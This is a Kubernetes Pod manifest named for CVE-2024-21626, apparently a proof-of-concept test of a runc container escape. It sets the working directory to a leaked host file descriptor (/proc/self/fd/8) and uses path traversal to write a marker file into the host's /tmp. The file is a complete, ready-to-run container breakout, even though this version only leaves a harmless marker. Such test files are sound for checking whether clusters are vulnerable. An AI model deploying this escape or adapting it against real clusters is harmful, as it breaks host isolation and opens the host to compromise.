apiVersion: v1
kind: Pod
metadata:
  name: cve202421616
  labels:
    app: escapetest
spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    workingDir: /proc/self/fd/8
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "touch ../../../../../../tmp/container-escape-cve202421616.txt; while true; do sleep 60; done;" ]
